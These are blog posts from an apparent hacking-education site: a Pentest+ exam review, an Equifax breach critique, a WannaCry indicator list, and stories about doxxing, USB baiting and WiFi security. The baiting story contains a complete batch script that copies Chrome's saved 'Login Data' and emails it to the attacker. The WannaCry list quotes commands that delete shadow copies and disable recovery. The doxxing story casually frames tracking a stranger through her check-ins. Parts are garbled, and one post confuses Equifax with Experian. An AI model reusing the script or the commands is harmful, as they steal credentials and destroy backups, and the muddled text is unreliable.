Taking the beta CompTIA Pentester+ Test

Glenn Norman hacking

Okay: I’m a “trifecta instructor” of some 20 years, plus a stack of certs and degrees, including the CEH. I’m going in to test this morning after a quick review of scripting languages. Currently teaching Net+ and Sec+ so I’m pretty fresh, but have no real idea what to expect. Have you reviewed the Objectives? They’re huge and wildly all over the place … SOAP and REST? Really? I’ll post thoughts after taking the test this morning (3/10).


Oh, am I ever glad I’ve done a lot of coding/scripting, and reviewed my PHP, Python and Ruby before the test. Right off the bat I got a long series of long, detailed scenario and “drag and drop” questions that I let suck up too much time. One involved dragging lines or blocks of code from a random assortment into working locations in a script. Recognizing the language was instantly critical. Another “interactive” section comprised ten questions where I needed to identify one-liner payloads and the right control to block them. Be sure you’re very clear on the different types of SQL injection and XSS. The multiple-choice questions were, for a relief, pretty normal. Some did make clear to me some of the things I’ve never done: creating a sandbox, and setting up persistence on a target once it’s been compromised. I know the CEH pretty well (I’m on the review board), and no it is not particularly similar to this test. The CEH concentrates on higher-level tools, like gui exploit tools and specific-function apps. The Pentest+ seems much more focused on knowing low-level tools like nc and nmap, sometimes deeply into the switches and syntax. Definitely spend time working/playing with these so the long, complex multiple choices don’t become a blur. I got 120 question for my 165 minutes, plus a lengthy pre-test agreement and a fairly quick post-test review, both off the clock. It was a race all the way, especially with the intricately detailed commands to pick in multiple-choice questions. I only finished 105, racing to the end, though since I got so many questions maybe I’ll get some slack for that. 😉 Notably, I did NOT see any policy, risk calculations, subnetting or crypto, and no SOAP or REST. Reading other people’s experiences, though, I’m betting there’s a huge question pool (that will hopefully get trimmed down) and your mileage will likely differ. Do I think I passed? I practically never think so walking out of a test, but I practically always do pass. Is it a good alternative to the CEH? I’d say it’s more similar than different. Both certs are really much more focused on defense than offense. It still looks like the OSCP is the big dog of real pen testing, and that’s okay. We all need ladders with more rungs above us.

Equifax Did Three Simple Things Wrong and Hacked Us All

Glenn Norman hacking

So Equifax was hacked not once, but twice? No way. I don’t believe it. If you’ve been hacked twice, you’ve been hacked at least 3.6 million times (or pick any other really big number you like). And notification of this new hack, like the last one, came at a languid pace. I’ve gotta give it to Equifax: if I did something like this, anything like this in my own business, I’d quickly go to prison. Their people are just walking out the door.

What irritates the devil out of me is that Equifax took an equally languid attitude toward the security of my personal information by violating three simple tenets of security. I know it’s not easy to manage a corporate network; I’ve been there. But there are fundamental measures anyone with a brain or responsibility has to take in this field, and Equifax outright failed to do these obvious things.

Principle One: Isolation

Not every system needs to touch the internet. Of those that do, none of them should have access to anything but the absolute minimal resources (meaning other systems) they need to do their job. Production networks should always be totally isolated: human resources, accounts payable, management, customer service and every other production operation should be utterly isolated from each other. Even if systems within them are compromised via email or the internet, they should provide no ingress – absolutely none – across functions. Your deepest assets (consumer records would qualify) should be deeply isolated.

“But customer service needs access to records, and so do the customers!”

Yes, and that functionality is still available. You’ll do it via strongly encrypted, strongly authenticated, highly secured connections. In other words, the segregation cannot be simply VLANs on a switch or even casually configured internal routers. No. Every production network should be encapsulated, firewalled, filtered and logged as an independent unit, one that considers itself surrounded by hostile would-be intruders. If I can walk through your DMZ to your online-data network, that’s a problem. But if I can then pivot to other production networks, it’s time for a firing squad.

Principle Two: Patch Management

All the mainstream security firms will hound you about this: stay patched right up to the minute! There is a tiny minority who would dispute this, arguing that proper isolation makes urgent patch management a useless exercise in anxiety. For my money, I’m going to do both (and a lot more).

The likely culprit here was an unpatched Apache Struts installation. Frameworks like Struts are popular with developers but eventually have to be managed by sysadmins, who may not love or follow them as closely. This is where tight collaboration between these teams has to ensure things that need to be patched (which includes practically everything that’s installed) are included in patch management lists and applications. I shouldn’t have to say it but those lists and apps must be intensively managed. That’s a pain, but lawsuits are a bigger pain, and really big lawsuits can be fatally painful for organizations.

Principle Three: Competent Management

Repeat after me: a degree in music does not qualify you to be CSO. (A degree in music does not qualify ….) Experian did not get this memo, and hired as Chief Security Officer one Susan Mauldin, music major, whose LinkedIn profile was edited and made private shortly after the hack was revealed, likely because she listed no relevant qualifications whatsoever.

I have been working, studying and teaching in this field for some 20 years, and I consider myself hardly qualified for a job like CSO. You’re playing with blood and money in that job. Even if you’re a brilliant poker player, this is 3D chess played with lions. If you can only play Whack-a-Mole on the computer, you should not be managing computer security for a major corporation. You’ll need to be a fanatical, deeply involved security fiend to play cop or Batman for a company like Experian.

This whole question of qualifications goes far beyond this field. A Chief Scientist should, for instance, be a scientist. This quickly gets political (at least for me), so I’ll stop now. But what Experian has done is not political, and not forgivable. They’re doing something that affects far too many people to approach it lackadaisically.

Now, the kernel: if you’re a malicious hacker, you’re going to be looking for exactly these weaknesses. During the Reconnaissance stage, finding a weak CIO or CSO would be a whiff of blood in the water. If a simple scan reveals unpatched vulns, bingo. And if weak or nonexistent network segmentation lets me go bounding through the corporate cyberverse, oh joy, oh glad (assuming I’m that malicious hacker). If I’m NOT a cracker, I’d be testing exactly these same limits because I’d be a pen tester or researcher or bounty hunter or whatever. Right?

WannaCry or WannCrypt or WannaCrypt.RSM (high risk alert)

Ransom: Of course it means (in the dictionary of cambridge) — a large amount of money that is demanded in exchange for someone who has been taken prisoner, or sometimes for an animal: plus, nowadays, Yes! for an important data. When it comes for a vital data/information and it was modified to be known as ransomware.



This time we wanna discuss a high risk alert ransomware called WannaCry! According to SonicWall Security Center’s research in mid-April they have noticed the ransomware and published protections and now the ransomware was updated to WannaCrypt version 2 and the UI looks like as the image we’ve featured to this post and they public some symptoms that you will face when you have got the attack on your system. Then we’d like to share these with you to make you aware of the ransomware.

A ransomware will be causing denial of access your vital information. Be aware of this.


SonicWall Security Center Alert the followings

WannaCrypt.RSM is a Trojan. A Trojan is a program that pretends to have a valid use, but in fact modifies the user’s computer in malicious ways. Trojans do not replicate or spread to other computers.

File Related Changes:
It drops the following file(s) on the system:

  • “C:\Documents and Settings\Default User\Start Menu\Programs\Startup\SDEF.tmp”
  • “C:\WINDOWS\Temp\!WannaDecryptor!.exe”
  • “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\SDCE.tmp”
  • “C:\WINDOWS\Temp\112881393834640_.bat”
  • “C:\Documents and Settings\Admin\Start Menu\Programs\Startup\SD8D.tmp”

It modifies the following additional file(s) on the system:

  • “C:\WINDOWS\system32\wbem\Logs\WMIC.LOG”

Process Related Changes:
It creates the following mutex(es):

  • ZonesCacheCounterMutex”
  • ZonesLockedCacheCounterMutex”
  • c:!documents and settings!admin!local settings!history!history.ie5!”
  • CTF.TMD.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003″
  • CTF.TimListCache.FMPDefaultS-1-5-21-1078081533-842925246-854245398-1003MUTEX.DefaultS-1-5-21-1078081533-842925246-854245398-1003″
  • CTF.Compart.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003″
  • c:!documents and settings!admin!local settings!temporary internet files!content.ie5!”
  • ZoneAttributeCacheCounterMutex”
  • WininetConnectionMutex”
  • CTF.Layouts.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003″
  • CTF.Asm.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003″
  • ZonesCounterMutex”
  • CTF.LBES.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003″
  • c:!documents and settings!admin!cookies!”

It creates the following process(es):

  • C:\WINDOWS\system32\taskkill.exe [ taskkill /f /im Microsoft.Exchange. ]
  • C:\WINDOWS\Temp\!WannaDecryptor!.exe [ !WannaDecryptor!.exe ]
  • C:\WINDOWS\Temp\b9b3965d1b218c63cd317ac33edcb942.exe [ \c:\windows\temp\b9b3965d1b218c63cd317ac33edcb942.exe ]
  • C:\WINDOWS\system32\taskkill.exe [ taskkill /f /im MSExchange ]
  • C:\WINDOWS\Temp\!WannaDecryptor!.exe [ !WannaDecryptor!.exe v ]
  • C:\WINDOWS\system32\cmd.exe [ cmd.exe /c start /b !WannaDecryptor!.exe v ]
  • C:\WINDOWS\system32\cmd.exe [ cmd.exe /c vssadmin delete shadows /all /quiet wmic shadowcopy delete bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no wbadmin delete catalog -quiet ]
  • C:\WINDOWS\system32\wbem\wmic.exe [ wmic shadowcopy delete ]
  • C:\WINDOWS\Temp\!WannaDecryptor!.exe [ !WannaDecryptor!.exe c ]
  • C:\WINDOWS\system32\taskkill.exe [ taskkill /f /im sqlserver.exe ]
  • C:\WINDOWS\system32\cmd.exe [ cmd /c 112881393834640.bat ]
  • C:\WINDOWS\system32\taskkill.exe [ taskkill /f /im sqlwriter.exe ]
  • C:\WINDOWS\Temp\!WannaDecryptor!.exe [ !WannaDecryptor!.exe f ]

Network Activity:
We observed the following DNS query/queries:

  • dist.torproject.org
  • www.dropbox.com
  • www.download.windowsupdate.com

It attempts to connect to the following remote servers:

  • 127.xxxxxx:1031
  • 127.xxxxxx:1037


As of May 12th 2017 we have observed a new variant of the WannaCrypt Ransomware. It has been reported that version 2 of this ransomware has been deployed by its operators on a large international scale. It has wreaked havoc among UK’s National Health Service by hitting at least 15 hospitals across the nation causing denial of access to vital patient information. Other attacks include Spanish telecommunications companies such as Vodafone and Telefonica.


School For Hackers


For You!




Dox means doc, the abbreviation of the English word document and a Slang of document. For attackers it’s like a weapon and for mad scientists it’s a treasured habit. This method is employed to acquire information of someone by hacking, social engineering and searching publicly available information and social media websites like Facebook. It might be carried out for various reasons for instance; to persuade, online shame, business analysis, aid law enforcement, harassment and so forth.

Race Start

Min Mg Mg was being curious a girl who he barely met at a café. Since he was so embarrassed to introduce himself to her he wished if he could know a bit of her background. Fortunately he observed that the girl had taken selfie and checked in on the facebook. “Yes, she currently has a vulnerability that’s “check in”, I need to test another if there is the other vulnerability out of two, “public post” please.” He said when he was searching her checking in on the page of the café where they were.

Race End

We never shall post publicly and shall disclose ourselves where we currently are on the social network ever. Since you might not realize who is doxxing you, you shouldn’t rest your assured no one is. We will link (Click here) you to one demonstration video based on this article.


School for Hackers

Therefore, for you.

Join the family.

(Starry Sky)

Well-known Social Engineering Ways

A brilliant engineer would hack out a smart solution to the problem at hand, and consider it a compliment to be called a hacker.  – For more reads please read the article Hack to live at https://schoolforhackers.com/category/hacking-tools/. The sure thing is; you find the way to get what you want to have. Let’s talk about a well-known social engineering way out of 5 here we would like to discuss.

  1. Baiting

               This way is named as baiting allegorically. It is similar to phishing (fishing) attack. The items or goods, a hacker use to entice victims distinguish them from other types of social engineering. Baiters focus on human curiosity via the use of physical media and they might offer users free audio and movie downloads.

Race Start

Min Mg Mg put some USB sticks around his roommates’ desks and practical room. One of his roommates picks up a USB Stick and was really curious to open it on his laptop then he opened. “Wow, many audios here, and videos as well, that’s really luck. Look, this video is interesting its name is “Myself”, let’s check it out the video to know whose USB stick is this.” He was muttering when he opened the video. “Grandpa, I put a video file that hooked with a barb; a batch file –

@echo off

color 08

mkdir \a  C:\Users\%username%\Documents\sm

move /Y sendEmail.exe C:\Users\%username%\Documents\sm

PATH=%path%; C:\Users\%username%\Documents\sm

cd %appdata%\..\Local\Google\Chrome\”User Data”\Default\

xcopy “Login Data” C:\Users\%username%\Documents /S /D /Y /Q /H /C

cd C:\Users\%username%\Documents\

copy  /Y “Login Data” LoginData

cd  C:\Users\%username%\Documents\sm\

sendEmail -f from@gmail.com -u subject -m Message Body  -a C:\Users\%username%\Documents\LoginData -t to@gmail.com -s smtp.gmail.com:587 -xu user@gmail.com -xp password -o tls=yes

start http://www.animateit.net/data/media/feb2013/love_roses_03.gif


with the playful windows script and it’s converted as a exe using bat to exe converter. I bound it with a Video file and sendEmail.exe files. Sooner I might have the Login Data file from his Google Chrome. When I put the Login Data to my Chrome profile I’ll see his saved password, if he saved his password on his browser.” Min Mg Mg said to grandpa when he was staring at his screen.

Race End            

Of course, we should be curious for the happiness of getting a USB on the street. You might want to keep in mind there are attackers out there who are doing these attack on purposes, even if the mentioned script is an amateur window script.

Hacking Tips from the Article, “How To Not Get Hacked, According To Expert Hackers”

Backlit keyboard

TV personality Kevin Roose asked for it, and he got it. He wanted to research how people get hacked, so he decided to invite some prominent hackers to hack him. And hack him they did, cracking into everything from his webcam (pictures every two minutes) to all his online accounts (including banks).
Personally, I wouldn’t do this. It’s all too apparent, to the hack-literate, how people get hacked; the harder part is figuring out how NOT to.
Some of the solutions he proposes are familiar, like using a password manager, which is unfortunately a sword sharp on both sides. Others were new to me: have you heard of an app called Little Snitch? It monitors your outgoing traffic for suspicious activity. (Why is my computer uploading my credit card statements to China?)
And some “solutions” are as effective for the cracker as for the person trying to protect themselves: using a VPN, for instance. You’ll see more on that subject in this space going forward.
In the mean time, give this article a look, prospective crackers, hackers and security professionals.
(Image courtesy of User:Colin at wikimedia.org)

Are you that very nice or emphasized of security?

are you that goodWhen your neighbor sees the hosport you broadcasted, the very first thought he has is “oh, look at it, I’ve got my neighbor’s wifi, I might get access it luckily” and click!
So what do you up to? Are you so nice to let everyone access your wifi, or want to have privacy or share with specific people? If you concern about network security, you have better off from public. Keep in your mind that everyone who comes into your network is not but willing to use the internet access you shared.
At the movie Cinderella, the King held a party for the price to choose the girl he loved and the royal prince’s invitation said “Every maid in the town was invited to the party.” despite the one who the prince actually awaited was Cinderella. Unfortunately, the step-sisters and step-mother of Cinderella enjoyed the party. Then, the step-mother got eavesdropped the Royal Guard’s conversations then she blackmailed the Royal Guard, shortly. So, we could be considerate as everyone who enjoyed the party had willing not but to have the party, to dig their own advantages.
Immediately, min mg mg steps up from the moments of he was at the movie and said “Grandpa, we should maintain a protection at our wifi, we haven’t better give access to everyone.” And the grandpa said “protection? Does it make sense if I keep this inside my iron cabinet?”. “No it doesn’t make any sense, we have to keep it outside to be able to access from your smart phone and my laptop to share the internet access but others.” min mg mg said. “Look, here are so many protection options to protect most of attacks and firewall settings as well” he said with getting access his small business wifi access device via a browser. And he continued “Here are the options WEP, WPA, WPA2”. “What the heaven?” Grandpa responded. The grandson said “chill up, I’m putting you down, grandpa, WEP is wired equivalent privacy, the security algorithm for IEEE 802.11. It was recognizable by the key of 10 (or) 16 hexadecimal digits. Its primary encryption method is; the encrypted ciper text are generated by doing the XOR Gates (Exclusive OR gate) of the keysteam by the combination of (IV) Initialization vector and keys, encrypted by the RC4, the encryption algorithm ciper (cyper) and the plaintext. It was 64-bit encryptions increased to 128-bit, yet Wi-Fi Alliance announced that the WEP had been superseded by WPA in 2003. So, immediate question is what is WPA? WPA is Wi-fi Protected Access, IEEE 802.11i sometime referred to as the draft standard IEEE 802.11. It’s anticipated to a yet securer, more complex WPA2. WPA2 was started in 2004. WEP provided data confidentiality comparable to the traditional wired network and WPA was developed by Wi-Fi Alliance to protect wireless computer network. WPA-PSK (pre-shared Key) is the common WPA configuration, used 256-bit key encryption. And it is associated with a system called message integrity check, determined if an attacker had captured or altered packets passed between the access point and client as well. The most significant change between WPA and WPA II is, Advanced Encryption Standard (AES) has to be used mandatorily.” And Grandpa spill his guts and said “Just do your thing ahead, oh my, headache, headache” and he continuously said “so, use WPA, a yet securer”. He looks slightly got the point. Of course, having a bright grandson like min mg mg is gratifying.
Young people have intelligent capabilities. We should provide them to be able to implement their imaginations. Rather than teaching them how to do, what we can do and what will be in order are the needs. If you keep blocking their inspirations by any mean, they can’t be able to realize “why”, much less great intelligence. That’s the reason Hacker High School is going for, they intend youths to be great by doing great things with great humility. In our environment, likewise we need to have someone like min mg mg who to help us to be able to understand the technologies well, at least, to be able to purchase the technology materials in fair-deal.
Well, now min mg mg is getting busy for a school conference. He is working on a presentation, based on a real world scamming matter to present. “The Scammed IT Guy” he just bannered it.are you that good